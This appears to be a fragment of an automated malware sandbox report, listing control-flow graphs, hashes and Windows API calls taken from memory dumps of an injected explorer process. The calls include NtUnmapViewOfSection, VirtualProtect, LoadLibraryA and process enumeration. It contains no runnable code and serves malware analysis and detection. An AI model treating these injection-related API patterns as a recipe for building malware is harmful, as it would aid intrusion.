                                                                                                                                                    • Instruction ID: 09714fee1153d0c8a0d09558f17c057e038896d471caa2abecd38832798f4051
                                                                                                                                                    • Opcode Fuzzy Hash: f2bddda09024333371eb43016242b53df61dfea823ae35ba426e9e4184a3369c
                                                                                                                                                    • Instruction Fuzzy Hash: EB21933021CE084FDB98FB2CA8992E937D2EB98350F44066DF94EC3296DE38D90587C5

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 114 61eb4-61f12 call 61db0 call 61838 FindFirstFileW 120 61f14-61f19 114->120 121 61f8f-61faf call 61860 114->121 123 61f74-61f84 120->123 124 61f1b-61f27 call 61d8c 120->124 123->120 129 61f86-61f87 123->129 124->123 130 61f29-61f53 call 61838 124->130 129->121 134 61f55-61f5b 130->134 135 61f63-61f6f call 61860 130->135 134->135 135->123
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00061DB0: FindFirstFileW.KERNELBASE ref: 00061E03
                                                                                                                                                    • FindFirstFileW.KERNELBASE ref: 00061F05
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000002A.00000002.624648363.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_42_2_61000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileFindFirst
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1974802433-0
                                                                                                                                                    • Opcode ID: 0e40d73f1c3fb02f90445bbd535556d967509254f5ca54610527c95814f758f5
                                                                                                                                                    • Instruction ID: f6f10a3c91a1c7be2883bec74a9f7d87337c7723b26a9329405511652b3714a0
                                                                                                                                                    • Opcode Fuzzy Hash: 0e40d73f1c3fb02f90445bbd535556d967509254f5ca54610527c95814f758f5
                                                                                                                                                    • Instruction Fuzzy Hash: 5B21447020CB484FDF84FF28A4997E977E2FBA8344F04066DA55AC3292DF38D9448785

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 138 65300-65310 call 61be8 141 65312-65345 call 61838 138->141 142 65390-65395 138->142 146 65347 call 61838 141->146 147 65371-6538a NtUnmapViewOfSection 141->147 151 6534c-65365 146->151 149 6539c-653ab call 65104 147->149 150 6538c-6538e 147->150 156 653b5-653be 149->156 157 653ad-653b0 call 65300 149->157 150->142 152 65396-6539b call 64c80 150->152 151->147 152->149 157->156
                                                                                                                                                    APIs
                                                                                                                                                    • NtUnmapViewOfSection.NTDLL ref: 00065378
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000002A.00000002.624648363.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_42_2_61000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: SectionUnmapView
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 498011366-0
                                                                                                                                                    • Opcode ID: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
                                                                                                                                                    • Instruction ID: a41e593be866e3ab021910bfc825c372ad5ca9bfff955d7c7ff76e928a4655b8
                                                                                                                                                    • Opcode Fuzzy Hash: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
                                                                                                                                                    • Instruction Fuzzy Hash: 5311C630601D094FEB9DFBB998992B933D6EB14312F54053AE415C73A2EE698B808340

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000002A.00000002.624648363.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_42_2_61000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 420147892-0
                                                                                                                                                    • Opcode ID: ae82cc3535c3e538fde35235a4c5f0d33198cca8bd70fb29295229ff6f9da322
                                                                                                                                                    • Instruction ID: fe06e9a5fd9309b4dc20b59eb16795e60247cbb6a137393a0b42ea9f151a395c
                                                                                                                                                    • Opcode Fuzzy Hash: ae82cc3535c3e538fde35235a4c5f0d33198cca8bd70fb29295229ff6f9da322
                                                                                                                                                    • Instruction Fuzzy Hash: 8001FF30208A088FD755EF28D8887EE76E2FBD8315F14462DA15AC61A5DB38D9458B45

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 10 6d748-6d74b 11 6d755-6d759 10->11 12 6d765 11->12 13 6d75b-6d763 11->13 14 6d767 12->14 15 6d74d-6d753 12->15 13->12 16 6d76a-6d771 14->16 15->11 18 6d773-6d77b 16->18 19 6d77d 16->19 18->19 19->16 20 6d77f-6d782 19->20 21 6d797-6d7a4 20->21 22 6d784-6d792 20->22 32 6d7a6-6d7a8 21->32 33 6d7be-6d7cc call 6d70a 21->33 23 6d794-6d795 22->23 24 6d7ce-6d7e9 22->24 23->21 25 6d81a-6d81d 24->25 27 6d822-6d829 25->27 28 6d81f-6d820 25->28 31 6d82f-6d833 27->31 30 6d801-6d805 28->30 34 6d807-6d80a 30->34 35 6d7eb-6d7ee 30->35 36 6d884-6d88d 31->36 37 6d835-6d84e LoadLibraryA 31->37 41 6d7ab-6d7b2 32->41 33->11 34->27 42 6d80c-6d810 34->42 35->27 39 6d7f0 35->39 40 6d890-6d899 36->40 38 6d84f-6d856 37->38 38->31 45 6d858-6d86e 38->45 46 6d7f1-6d7f5 39->46 47 6d8be-6d90e VirtualProtect * 2 40->47 48 6d89b-6d89d 40->48 57 6d7b4-6d7ba 41->57 58 6d7bc 41->58 42->46 49 6d812-6d819 42->49 60 6d870-6d877 45->60 61 6d879-6d883 45->61 46->30 50 6d7f7-6d7f9 46->50 54 6d912-6d917 47->54 51 6d8b0-6d8bc 48->51 52 6d89f-6d8ae 48->52 49->25 50->30 56 6d7fb-6d7ff 50->56 51->52 52->40 54->54 59 6d919-6d928 54->59 56->30 56->34 57->58 58->33 58->41 60->38
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,F6171042,?,2EC0275B), ref: 0006D847
                                                                                                                                                    • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 0006D8E5
                                                                                                                                                    • VirtualProtect.KERNELBASE ref: 0006D903
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000002A.00000002.624648363.000000000006C000.00000040.80000000.00040000.00000000.sdmp, Offset: 0006C000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_42_2_6c000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 895956442-0
                                                                                                                                                    • Opcode ID: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
                                                                                                                                                    • Instruction ID: fb22e33ff937d24d93fb2efd063ba145730d0834d4eb26fcdd67a2d867c28293
                                                                                                                                                    • Opcode Fuzzy Hash: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
                                                                                                                                                    • Instruction Fuzzy Hash: 23515A32B5891D4FCB24AA3C9CC87F9B7D2F755325B58063BC49AC3285EE58D84683C2

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00061D08: CreateToolhelp32Snapshot.KERNEL32 ref: 00061D1D
                                                                                                                                                      • Part of subcall function 00061D08: Process32First.KERNEL32 ref: 00061D3C
                                                                                                                                                      • Part of subcall function 00061D08: CloseHandle.KERNELBASE ref: 00061D74
                                                                                                                                                      • Part of subcall function 00061D08: Process32Next.KERNEL32 ref: 00061D67
                                                                                                                                                    • SleepEx.KERNELBASE ref: 00064952
                                                                                                                                                    • SHGetSpecialFolderPathW.SHELL32 ref: 00064971
                                                                                                                                                      • Part of subcall function 00061EB4: FindFirstFileW.KERNELBASE ref: 00061F05
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000002A.00000002.624648363.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_42_2_61000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FirstProcess32$CloseCreateFileFindFolderHandleNextPathSleepSnapshotSpecialToolhelp32
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3895732408-0
                                                                                                                                                    • Opcode ID: d94504f5ac59451a2c57a4813436b0da2714d47fc540bee79ff9f433ebcff8c2
                                                                                                                                                    • Instruction ID: fd7257a88bddf19c1770b39e9a1f92ec56404b8002fce2def5eb906a896e2c11
                                                                                                                                                    • Opcode Fuzzy Hash: d94504f5ac59451a2c57a4813436b0da2714d47fc540bee79ff9f433ebcff8c2
                                                                                                                                                    • Instruction Fuzzy Hash: A0317331618A084FDB59FF68E8995EA73E3FB98301B14462EE44BC3262DE34D9458BC1

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 88 61b74-61b94 OpenFileMappingA 89 61b96-61bb4 MapViewOfFile 88->89 90 61bb7-61bc4 88->90 89->90
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000002A.00000002.624648363.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_42_2_61000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$MappingOpenView
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3439327939-0
                                                                                                                                                    • Opcode ID: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
                                                                                                                                                    • Instruction ID: ddaee3d7e8f9e73a22afb263a5f2562a7b1b5803ba9d96df92eae33d24df65e4
                                                                                                                                                    • Opcode Fuzzy Hash: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
                                                                                                                                                    • Instruction Fuzzy Hash: A5F01C35318F094FAB44EF7C9C8C576B7E1EBA8202B048A7EA95AC7165EF74C8818751